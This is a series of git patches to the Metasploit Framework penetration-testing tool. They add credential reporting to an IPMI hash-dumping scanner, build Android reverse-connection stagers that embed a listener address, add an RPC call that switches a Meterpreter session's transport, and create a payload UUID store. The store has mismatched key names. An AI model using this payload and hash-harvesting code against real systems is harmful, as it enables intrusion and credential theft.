         break
       end
     end
@@ -265,6 +244,51 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def service_data
+    {
+      address: rhost,
+      port: rport,
+      service_name: 'ipmi',
+      protocol: 'udp',
+      workspace_id: myworkspace_id
+    }
+  end
+
+  def report_hash(user, hash)
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      private_data: hash,
+      private_type: :nonreplayable_hash,
+      jtr_format: 'rakp_hmac_sha1_hash',
+      username: user,
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def report_cracked_cred(user, password)
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      private_data: password,
+      private_type: :password,
+      username: user,
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   #
   # Helper methods (these didn't quite fit with existing mixins)
   #
@@ -292,5 +316,4 @@ class Metasploit3 < Msf::Auxiliary
   def rport
     datastore['RPORT']
   end
-
 end

From f49362492a5f92a2ee6cad5215c95888b271e2a0 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 18 May 2015 19:46:17 -0500
Subject: [PATCH 0125/1013] Report hash's username correctly

---
 modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
index 26f85371ce..7c93ee8a81 100644
--- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
@@ -180,7 +180,7 @@ class Metasploit3 < Msf::Auxiliary
 
       # Write the rakp hash to the database
       hash = "#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}"
-      report_hash(user, hash)
+      report_hash(username, hash)
       # Write the vulnerability to the database
       unless reported_vuln
         report_vuln(

From d564a85f6fec89a9cc85ce2771ae98be905be725 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 18 May 2015 19:55:48 -0500
Subject: [PATCH 0126/1013] Fix jtr_format

---
 modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
index 7c93ee8a81..5ec74e9c31 100644
--- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
@@ -260,7 +260,7 @@ class Metasploit3 < Msf::Auxiliary
       origin_type: :service,
       private_data: hash,
       private_type: :nonreplayable_hash,
-      jtr_format: 'rakp_hmac_sha1_hash',
+      jtr_format: 'rakp',
       username: user,
     }.merge(service_data)
 

From c7932855f2c4ef163ece19a0b05bb8fa7fe47484 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Mon, 18 May 2015 23:35:18 -0500
Subject: [PATCH 0127/1013] Move UUIDOptions to UUID::Options

---
 lib/msf/core/payload/transport_config.rb      |  4 +-
 lib/msf/core/payload/uuid_options.rb          | 73 -------------------
 lib/msf/core/payload/windows/reverse_http.rb  |  4 +-
 .../payloads/stagers/java/reverse_https.rb    |  4 +-
 .../payloads/stagers/python/reverse_https.rb  |  4 +-
 .../windows/reverse_http_proxy_pstore.rb      |  4 +-
 6 files changed, 10 insertions(+), 83 deletions(-)
 delete mode 100644 lib/msf/core/payload/uuid_options.rb

diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb
index 177684ed47..f75c5c3db2 100644
--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -1,6 +1,6 @@
 # -*- coding: binary -*-
 
-require 'msf/core/payload/uuid_options'
+require 'msf/core/payload/uuid/options'
 
 ##
 # This module contains helper functions for creating the transport
@@ -8,7 +8,7 @@ require 'msf/core/payload/uuid_options'
 ##
 module Msf::Payload::TransportConfig
 
-  include Msf::Payload::UUIDOptions
+  include Msf::Payload::UUID::Options
 
   def transport_config_reverse_tcp(opts={})
     config = transport_config_bind_tcp(opts)
diff --git a/lib/msf/core/payload/uuid_options.rb b/lib/msf/core/payload/uuid_options.rb
deleted file mode 100644
index 3ced04c4a7..0000000000
--- a/lib/msf/core/payload/uuid_options.rb
+++ /dev/null
@@ -1,73 +0,0 @@
-# -*- coding => binary -*-
-
-require 'msf/core'
-require 'msf/core/payload/uuid'
-require 'rex/payloads/meterpreter/uri_checksum'
-
-#
-# This module provides datastore option definitions and helper methods for payload modules that support UUIDs
-#
-module Msf::Payload::UUIDOptions
-
-  include Rex::Payloads::Meterpreter::UriChecksum
-
-  def initialize(info = {})
-    super
-    register_advanced_options(
-      [
-        Msf::OptString.new('PayloadUUIDSeed', [ false, 'A string to use when generating the payload UUID (deterministic)']),
-        Msf::OptString.new('PayloadUUIDRaw', [ false, 'A hex string representing the raw 8-byte PUID value for the UUID']),
-      ], self.class)
-  end
-
-  #
-  # Generates a URI with a given checksum and optionally with an embedded UUID if
-  # the desired length can accommodate it.
-  #
-  # @param mode [Symbol] The type of checksum to generate (:connect, :init_native, :init_python, :init_java)
-  # @param len [Fixnum] The length of the URI not including the leading slash, optionally nil for random
-  # @return [String] A URI with a leading slash that hashes to the checksum, with an optional UUID
-  #
-  def generate_uri_uuid_mode(mode,len=nil)
-    sum = uri_checksum_lookup(mode)
-
-    # The URI length may not have room for an embedded checksum
-    if len && len < URI_CHECKSUM_UUID_MIN_LEN
-      # Throw an error if the user set a seed, but there is no room for it
-      if datastore['PayloadUUIDSeed'].to_s.length > 0 ||datastore['PayloadUUIDRaw'].to_s.length > 0
-        raise ArgumentError, "A PayloadUUIDSeed or PayloadUUIDRaw value was specified, but this payload doesn't have enough room for a UUID"
-      end
-      return "/" + generate_uri_checksum(sum, len, prefix="")
-    end
-
-    generate_uri_uuid(sum, generate_payload_uuid, len)
-  end
-
-  # Generate a Payload UUID
-  def generate_payload_uuid
-
-    conf = {
-      arch:     self.arch,
-      platform: self.platform
-    }
-
-    # Handle user-specified seed values
-    if datastore['PayloadUUIDSeed'].to_s.length > 0
-      conf[:seed] = datastore['PayloadUUIDSeed'].to_s
-    end
-
-    # Handle user-specified raw payload UID values
-    if datastore['PayloadUUIDRaw'].to_s.length > 0
-      puid_raw = [datastore['PayloadUUIDRaw'].to_s].pack("H*")
-      if puid_raw.length != 8
-        raise ArgumentError, "The PayloadUUIDRaw value must be exactly 16 bytes of hex"
-      end
-      conf.delete(:seed)
-      conf[:puid] = puid_raw
-    end
-
-    Msf::Payload::UUID.new(conf)
-  end
-
-end
-
diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb
index 71b3df71e2..b352f921a1 100644
--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -4,7 +4,7 @@ require 'msf/core'
 require 'msf/core/payload/transport_config'
 require 'msf/core/payload/windows/block_api'
 require 'msf/core/payload/windows/exitfunk'
-require 'msf/core/payload/uuid_options'
+require 'msf/core/payload/uuid/options'
 
 module Msf
 
@@ -22,7 +22,7 @@ module Payload::Windows::ReverseHttp
   include Msf::Payload::Windows
   include Msf::Payload::Windows::BlockApi
   include Msf::Payload::Windows::Exitfunk
-  include Msf::Payload::UUIDOptions
+  include Msf::Payload::UUID::Options
 
   #
   # Register reverse_http specific options
diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb
index 1c00b95b6a..4318ad3f42 100644
--- a/modules/payloads/stagers/java/reverse_https.rb
+++ b/modules/payloads/stagers/java/reverse_https.rb
@@ -5,7 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_https'
-require 'msf/core/payload/uuid_options'
+require 'msf/core/payload/uuid/options'
 
 module Metasploit3
 
@@ -13,7 +13,7 @@ module Metasploit3
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
-  include Msf::Payload::UUIDOptions
+  include Msf::Payload::UUID::Options
 
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/stagers/python/reverse_https.rb b/modules/payloads/stagers/python/reverse_https.rb
index 6437db03f6..cc8d012738 100644
--- a/modules/payloads/stagers/python/reverse_https.rb
+++ b/modules/payloads/stagers/python/reverse_https.rb
@@ -5,14 +5,14 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_https'
-require 'msf/core/payload/uuid_options'
+require 'msf/core/payload/uuid/options'
 
 module Metasploit3
 
   CachedSize = 742
 
   include Msf::Payload::Stager
-  include Msf::Payload::UUIDOptions
+  include Msf::Payload::UUID::Options
 
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb
index fcb1f49ca1..3ba25412bf 100644
--- a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb
+++ b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb
@@ -5,7 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_http'
-require 'msf/core/payload/uuid_options'
+require 'msf/core/payload/uuid/options'
 
 module Metasploit3
 
@@ -13,7 +13,7 @@ module Metasploit3
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
-  include Msf::Payload::UUIDOptions
+  include Msf::Payload::UUID::Options
 
   def self.handler_type_alias
     "reverse_http_proxy_pstore"

From 9d7e54f360c2ec7adb373b86ee26141a47acc1e2 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Mon, 18 May 2015 23:41:22 -0500
Subject: [PATCH 0128/1013] Add the UUID subdirectory, including initial DB
 class

---
 lib/msf/core/payload/uuid/db.rb      | 115 +++++++++++++++++++++++++++
 lib/msf/core/payload/uuid/options.rb |  73 +++++++++++++++++
 2 files changed, 188 insertions(+)
 create mode 100644 lib/msf/core/payload/uuid/db.rb
 create mode 100644 lib/msf/core/payload/uuid/options.rb

diff --git a/lib/msf/core/payload/uuid/db.rb b/lib/msf/core/payload/uuid/db.rb
new file mode 100644
index 0000000000..fe3f210952
--- /dev/null
+++ b/lib/msf/core/payload/uuid/db.rb
@@ -0,0 +1,115 @@
+# -*- coding => binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/uuid'
+require 'json'
+
+#
+# This module provides a flat file database interface for managing UUIDs
+#
+class Msf::Payload::UUID::DB
+
+  attr_accessor :info, :path
+
+  def initialize(path)
+    self.info = {}
+    self.path = path
+    @lock = Mutex.new
+    @last = 0
+    reload
+  end
+
+  # Save the file, but prevent thread & process contention
+  def save(action={})
+    @lock.synchronize do
+      ::File.open(path, ::File::RDWR|::File::CREAT) do |fd|
+        fd.flock(::File::LOCK_EX)
+
+        # Reload and merge if the file has changed recently
+        if fd.stat.mtime.to_f > @last
+          self.info = parse_data(fd.read).merge(self.info)
+        end
+
+        if action[:register_uuid]
+          params = (action[:params] || {}).merge({ type: 'uuid' })
+          self.info[ action[:register_uuid] ] = params
+        end
+
+        if action[:register_url]
+          params = (action[:params] || {}).merge({ type: 'url' })
+          self.info[ action[:register_uurl] ] = params
+        end
+
+        if action[:remove_uuid]
+          self.info.delete(action[:delete_uuid])
+        end
+
+        fd.rewind
+        fd.write(JSON.pretty_generate(self.info))
+        fd.sync
+        fd.truncate(fd.pos)
+
+        @last = Time.now.to_f
+      end
+    end
+  end
+
+  # Load the file from disk
+  def load
+    @lock.synchronize do
+      ::File.open(path, ::File::RDWR|::File::CREAT) do |fd|
+        fd.flock(::File::LOCK_EX)
+        @last = fd.stat.mtime.to_f
+        self.info = parse_data(fd.read(fd.stat.size))
+      end
+    end
+  end
+
+  # Reload if the file has changed
+  def reload
+    return unless ::File.exists?(path)
+    return unless ::File.stat(path).mtime.to_f > @last
+    load
+  end
+
+  def register_uuid(uuid, params)
+    save(register_uuid: uuid, params: params)
+  end
+
+  def remove_uuid(uuid)
+    save(remove_uuid: uuid)
+  end
+
+  def find_uuid(uuid)
+    reload
+    self.info[uuid]
+  end
+
+  def register_url(url, params)
+    save(register_url: url, params: params)
+  end
+
+  def remove_url(url)
+    save(remove_url: url)
+  end
+
+  def find_url(url)
+    reload
+    self.info[url]
+  end
+
+private
+
+  def parse_data(data)
+    return {} if data.to_s.strip.length == 0
+    begin
+      JSON.parse(data)
+    rescue JSON::ParserError => e
+      # TODO: Figure out the appropriate error handling path
+      raise e
+    end
+  end
+
+end
+
+
diff --git a/lib/msf/core/payload/uuid/options.rb b/lib/msf/core/payload/uuid/options.rb
new file mode 100644
index 0000000000..083a3a655b
--- /dev/null
+++ b/lib/msf/core/payload/uuid/options.rb
@@ -0,0 +1,73 @@
+# -*- coding => binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/uuid'
+require 'rex/payloads/meterpreter/uri_checksum'
+
+#
+# This module provides datastore option definitions and helper methods for payload modules that support UUIDs
+#
+module Msf::Payload::UUID::Options
+
+  include Rex::Payloads::Meterpreter::UriChecksum
+
+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        Msf::OptString.new('PayloadUUIDSeed', [ false, 'A string to use when generating the payload UUID (deterministic)']),
+        Msf::OptString.new('PayloadUUIDRaw', [ false, 'A hex string representing the raw 8-byte PUID value for the UUID']),
+      ], self.class)
+  end
+
+  #
+  # Generates a URI with a given checksum and optionally with an embedded UUID if
+  # the desired length can accommodate it.
+  #
+  # @param mode [Symbol] The type of checksum to generate (:connect, :init_native, :init_python, :init_java)
+  # @param len [Fixnum] The length of the URI not including the leading slash, optionally nil for random
+  # @return [String] A URI with a leading slash that hashes to the checksum, with an optional UUID
+  #
+  def generate_uri_uuid_mode(mode,len=nil)
+    sum = uri_checksum_lookup(mode)
+
+    # The URI length may not have room for an embedded checksum
+    if len && len < URI_CHECKSUM_UUID_MIN_LEN
+      # Throw an error if the user set a seed, but there is no room for it
+      if datastore['PayloadUUIDSeed'].to_s.length > 0 ||datastore['PayloadUUIDRaw'].to_s.length > 0
+        raise ArgumentError, "A PayloadUUIDSeed or PayloadUUIDRaw value was specified, but this payload doesn't have enough room for a UUID"
+      end
+      return "/" + generate_uri_checksum(sum, len, prefix="")
+    end
+
+    generate_uri_uuid(sum, generate_payload_uuid, len)
+  end
+
+  # Generate a Payload UUID
+  def generate_payload_uuid
+
+    conf = {
+      arch:     self.arch,
+      platform: self.platform
+    }
+
+    # Handle user-specified seed values
+    if datastore['PayloadUUIDSeed'].to_s.length > 0
+      conf[:seed] = datastore['PayloadUUIDSeed'].to_s
+    end
+
+    # Handle user-specified raw payload UID values
+    if datastore['PayloadUUIDRaw'].to_s.length > 0
+      puid_raw = [datastore['PayloadUUIDRaw'].to_s].pack("H*")
+      if puid_raw.length != 8
+        raise ArgumentError, "The PayloadUUIDRaw value must be exactly 16 bytes of hex"
+      end
+      conf.delete(:seed)
+      conf[:puid] = puid_raw
+    end
+
+    Msf::Payload::UUID.new(conf)
+  end
+
+end
+

From e7c8a3b56c4efe14e5dd34dfb6cdb46f4016f04a Mon Sep 17 00:00:00 2001
From: Tim <timrlw@gmail.com>
Date: Sun, 17 May 2015 18:53:11 +0100
Subject: [PATCH 0129/1013] add support for SessionRetryTotal and
 SessionRetryWait on Android

---
 lib/msf/core/payload/dalvik.rb                    | 5 +++++
 modules/payloads/stagers/android/reverse_http.rb  | 8 ++------
 modules/payloads/stagers/android/reverse_https.rb | 8 ++------
 modules/payloads/stagers/android/reverse_tcp.rb   | 8 ++------
 4 files changed, 11 insertions(+), 18 deletions(-)

diff --git a/lib/msf/core/payload/dalvik.rb b/lib/msf/core/payload/dalvik.rb
index 43ecd9cc61..d469af1ccd 100644
--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@@ -31,6 +31,11 @@ module Msf::Payload::Dalvik
     [str.length].pack("N") + str
   end
 
+  def apply_options(classes)
+    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['SessionRetryTotal'].to_s)
+    string_sub(classes, 'SSSS                                ', "SSSS" + datastore['SessionRetryWait'].to_s)
+  end
+
   def string_sub(data, placeholder="", input="")
     data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
   end
diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb
index cfb39c9d37..6c8274a8b9 100644
--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -24,11 +24,6 @@ module Metasploit3
       'Handler'       => Msf::Handler::ReverseHttp,
       'Stager'        => {'Payload' => ""}
       ))
-
-    register_options(
-    [
-      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
-    ], self.class)
   end
 
   def generate_jar(opts={})
@@ -40,7 +35,8 @@ module Metasploit3
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
     string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + host + ":" + port)
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    apply_options(classes)
+
     jar.add_file("classes.dex", fix_dex_header(classes))
 
     files = [
diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb
index 3ab3f31752..7b353a693d 100644
--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -24,11 +24,6 @@ module Metasploit3
       'Handler'       => Msf::Handler::ReverseHttps,
       'Stager'        => {'Payload' => ""}
     ))
-
-    register_options(
-    [
-      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
-    ], self.class)
   end
 
   def generate_jar(opts={})
@@ -40,7 +35,8 @@ module Metasploit3
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
     string_sub(classes, 'ZZZZ                                ', "ZZZZhttps://" + host + ":" + port)
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    apply_options(classes)
+
     jar.add_file("classes.dex", fix_dex_header(classes))
 
     files = [
diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb
index 74978ad295..3985848e58 100644
--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -26,11 +26,6 @@ module Metasploit3
       'Handler'		=> Msf::Handler::ReverseTcp,
       'Stager'		=> {'Payload' => ""}
     ))
-
-    register_options(
-    [
-      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
-    ], self.class)
   end
 
   def generate_jar(opts={})
@@ -40,7 +35,8 @@ module Metasploit3
 
     string_sub(classes, 'XXXX127.0.0.1                       ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST']
     string_sub(classes, 'YYYY4444                            ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT']
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    apply_options(classes)
+
     jar.add_file("classes.dex", fix_dex_header(classes))
 
     files = [

From ebd20fbedd074e4e81e6ec2e4677cf670619c3f4 Mon Sep 17 00:00:00 2001
From: Tim <timrlw@gmail.com>
Date: Tue, 19 May 2015 16:25:46 +0100
Subject: [PATCH 0130/1013] fix http

---
 .../payloads/stagers/android/reverse_http.rb  | 19 ++++++++++++-------
 1 file changed, 12 insertions(+), 7 deletions(-)

diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb
index 6c8274a8b9..1830d5ae62 100644
--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -27,23 +27,28 @@ module Metasploit3
   end
 
   def generate_jar(opts={})
-    host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
-    port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
-    raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+    # Default URL length is 30-256 bytes
+    uri_req_len = 30 + rand(256-30)
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
 
-    jar = Rex::Zip::Jar.new
+    lurl = "ZZZZhttp://#{datastore["LHOST"]}"
+    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
+    lurl << "/"
+    lurl << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
-    string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + host + ":" + port)
+    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
     apply_options(classes)
 
+    jar = Rex::Zip::Jar.new
     jar.add_file("classes.dex", fix_dex_header(classes))
-
     files = [
       [ "AndroidManifest.xml" ],
       [ "resources.arsc" ]
     ]
-
     jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
     jar.build_manifest
 

From 3b8effc5893d78386c8d5a9624e18178da57bf30 Mon Sep 17 00:00:00 2001
From: Tim <timrlw@gmail.com>
Date: Tue, 19 May 2015 16:27:10 +0100
Subject: [PATCH 0131/1013] fix ext_server_android.jar error

---
 lib/msf/base/sessions/meterpreter_android.rb | 7 -------
 lib/msf/base/sessions/meterpreter_options.rb | 6 ------
 2 files changed, 13 deletions(-)

diff --git a/lib/msf/base/sessions/meterpreter_android.rb b/lib/msf/base/sessions/meterpreter_android.rb
index f3417ae8c7..01080744d3 100644
--- a/lib/msf/base/sessions/meterpreter_android.rb
+++ b/lib/msf/base/sessions/meterpreter_android.rb
@@ -19,13 +19,6 @@ class Meterpreter_Java_Android < Msf::Sessions::Meterpreter_Java_Java
     self.platform = 'java/android'
   end
 
-  def load_android
-    original = console.disable_output  
-    console.disable_output = true
-    console.run_single('load android')
-    console.disable_output = original
-  end
-
 end
 
 end
diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb
index 30c3711ee1..aa0b5c4136 100644
--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -64,12 +64,6 @@ module MeterpreterOptions
         end
       end
 
-      if session.platform =~ /android/i
-        if datastore['AutoLoadAndroid']
-          session.load_android
-        end
-      end
-
       [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
         if (datastore[key].empty? == false)
           args = Shellwords.shellwords( datastore[key] )

From 48c50a897c258de2086b52a1c09efaf5523bfd62 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Tue, 19 May 2015 14:43:25 -0500
Subject: [PATCH 0132/1013] add rpc call to change meterp transport

this rpc method allows the user to change transport
on an existing meterp session. if it's successful
it will close the old 'session' tied to the rpevious transport

MSP-12722
---
 lib/msf/core/rpc/v10/rpc_session.rb | 31 +++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)

diff --git a/lib/msf/core/rpc/v10/rpc_session.rb b/lib/msf/core/rpc/v10/rpc_session.rb
index 21da5afbd4..a671d2a5d4 100644
--- a/lib/msf/core/rpc/v10/rpc_session.rb
+++ b/lib/msf/core/rpc/v10/rpc_session.rb
@@ -395,6 +395,37 @@ class RPC_Session < RPC_Base
     rpc_meterpreter_run_single( sid, "run #{data}")
   end
 
+  # Changes the Transport of a given Meterpreter Session
+  #
+  # @option opts [String] :transport The transport protocol to use (e.g. reverse_tcp, reverse_http, bind_tcp etc)
+  # @option opts [String] :lhost  The LHOST of the listener to use
+  # @option opts [String] :lport The LPORT of the listener to use
+  # @option opts [String] :ua The User Agent String to use for reverse_http(s)
+  # @option opts [String] :proxy_host The address of the proxy to route transport through
+  # @option opts [String] :proxy_port The port the proxy is listening on
+  # @option opts [String] :proxy_type The type of proxy to use
+  # @option opts [String] :proxy_user The username to authenticate to the proxy with
+  # @option opts [String] :proxy_pass The password to authenticate to the proxy with
+  # @option opts [String] :comm_timeout Connection timeout in seconds
+  # @option opts [String] :session_exp  Session Expiration Timeout
+  # @option opts [String] :retry_total Total number of times to retry etsablishing the transport
+  # @option opts [String] :retry_wait The number of seconds to wait between retries
+  # @option opts [String] :cert  Path to the SSL Cert to use for HTTPS
+  # @return [Boolean] whether the transport was changed successfully
+  def rpc_meterpreter_transport_change(sid,opts={})
+    session = _valid_session(sid,"meterpreter")
+    real_opts = {}
+    opts.each_pair do |key, value|
+      real_opts[key.to_sym] = value
+    end
+    real_opts[:uuid] = session.payload_uuid
+    result = session.core.transport_change(real_opts)
+    if result == true
+      rpc_stop(sid)
+    end
+    result
+  end
+
 
   # Returns the separator used by the meterpreter.
   #

From 513a81e3402ae846bc592dd98dd58e65aa358bd5 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 20 May 2015 00:28:32 -0500
Subject: [PATCH 0133/1013] Add framework.uuid_db as a JSONHashFile

---
 lib/msf/core/framework.rb       |  10 ++-
 lib/msf/core/payload/uuid/db.rb | 115 --------------------------------
 lib/rex/json_hash_file.rb       |  94 ++++++++++++++++++++++++++
 3 files changed, 103 insertions(+), 116 deletions(-)
 delete mode 100644 lib/msf/core/payload/uuid/db.rb
 create mode 100644 lib/rex/json_hash_file.rb

diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb
index 69787fc3e8..fe54145d0d 100644
--- a/lib/msf/core/framework.rb
+++ b/lib/msf/core/framework.rb
@@ -73,7 +73,7 @@ class Framework
   require 'msf/core/plugin_manager'
   require 'msf/core/db_manager'
   require 'msf/core/event_dispatcher'
-
+  require 'rex/json_hash_file'
 
   #
   # Creates an instance of the framework context.
@@ -91,6 +91,7 @@ class Framework
     self.datastore = DataStore.new
     self.jobs      = Rex::JobContainer.new
     self.plugins   = PluginManager.new(self)
+    self.uuid_db   = Rex::JSONHashFile.new(::File.join(Msf::Config.config_directory, "payloads.json"))
 
     # Configure the thread factory
     Rex::ThreadFactory.provider = Metasploit::Framework::ThreadFactoryProvider.new(framework: self)
@@ -187,6 +188,12 @@ class Framework
   # unloading of plugins.
   #
   attr_reader   :plugins
+  #
+  # The framework instance's payload uuid database.  The payload uuid
+  # database is used to record and match the unique ID values embedded
+  # into generated payloads.
+  #
+  attr_reader   :uuid_db
 
   # The framework instance's db manager. The db manager
   # maintains the database db and handles db events
@@ -243,6 +250,7 @@ protected
   attr_writer   :jobs # :nodoc:
   attr_writer   :plugins # :nodoc:
   attr_writer   :db # :nodoc:
+  attr_writer   :uuid_db # :nodoc:
 end
 
 class FrameworkEventSubscriber
diff --git a/lib/msf/core/payload/uuid/db.rb b/lib/msf/core/payload/uuid/db.rb
deleted file mode 100644
index fe3f210952..0000000000
--- a/lib/msf/core/payload/uuid/db.rb
+++ /dev/null
@@ -1,115 +0,0 @@
-# -*- coding => binary -*-
-
-require 'msf/core'
-require 'msf/core/payload/uuid'
-require 'json'
-
-#
-# This module provides a flat file database interface for managing UUIDs
-#
-class Msf::Payload::UUID::DB
-
-  attr_accessor :info, :path
-
-  def initialize(path)
-    self.info = {}
-    self.path = path
-    @lock = Mutex.new
-    @last = 0
-    reload
-  end
-
-  # Save the file, but prevent thread & process contention
-  def save(action={})
-    @lock.synchronize do
-      ::File.open(path, ::File::RDWR|::File::CREAT) do |fd|
-        fd.flock(::File::LOCK_EX)
-
-        # Reload and merge if the file has changed recently
-        if fd.stat.mtime.to_f > @last
-          self.info = parse_data(fd.read).merge(self.info)
-        end
-
-        if action[:register_uuid]
-          params = (action[:params] || {}).merge({ type: 'uuid' })
-          self.info[ action[:register_uuid] ] = params
-        end
-
-        if action[:register_url]
-          params = (action[:params] || {}).merge({ type: 'url' })
-          self.info[ action[:register_uurl] ] = params
-        end
-
-        if action[:remove_uuid]
-          self.info.delete(action[:delete_uuid])
-        end
-
-        fd.rewind
-        fd.write(JSON.pretty_generate(self.info))
-        fd.sync
-        fd.truncate(fd.pos)
-
-        @last = Time.now.to_f
-      end
-    end
-  end
-
-  # Load the file from disk
-  def load
-    @lock.synchronize do
-      ::File.open(path, ::File::RDWR|::File::CREAT) do |fd|
-        fd.flock(::File::LOCK_EX)
-        @last = fd.stat.mtime.to_f
-        self.info = parse_data(fd.read(fd.stat.size))
-      end
-    end
-  end
-
-  # Reload if the file has changed
-  def reload
-    return unless ::File.exists?(path)
-    return unless ::File.stat(path).mtime.to_f > @last
-    load
-  end
-
-  def register_uuid(uuid, params)
-    save(register_uuid: uuid, params: params)
-  end
-
-  def remove_uuid(uuid)
-    save(remove_uuid: uuid)
-  end
-
-  def find_uuid(uuid)
-    reload
-    self.info[uuid]
-  end
-
-  def register_url(url, params)
-    save(register_url: url, params: params)
-  end
-
-  def remove_url(url)
-    save(remove_url: url)
-  end
-
-  def find_url(url)
-    reload
-    self.info[url]
-  end
-
-private
-
-  def parse_data(data)
-    return {} if data.to_s.strip.length == 0
-    begin
-      JSON.parse(data)
-    rescue JSON::ParserError => e
-      # TODO: Figure out the appropriate error handling path
-      raise e
-    end
-  end
-
-end
-
-
